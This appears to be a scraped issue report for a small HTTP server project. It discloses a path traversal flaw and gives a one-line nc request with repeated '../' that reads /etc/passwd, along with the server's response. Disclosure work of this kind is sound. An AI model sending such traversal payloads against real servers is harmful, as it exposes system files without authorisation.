minimal-http-server icon indicating copy to clipboard operation
minimal-http-server copied to clipboard

Published 20 hours ago verified publisher icon iFuSiiOnzZ

LFI vurnability

Open Cotix opened this issue 9 years ago • 0 comments

It is possible to read every file on the system using ../

try: [cotix@lithium ~]$ nc localhost 8080 GET /../../../../../../../etc/passwd HTTP/1.0

HTTP/1.0 200 OK Content-Type: text/plain

root: x:0:0:root:/root:/bin/bash ... rest of my /etc/passwd file

Cotix avatar Apr 23 '15 22:04 Cotix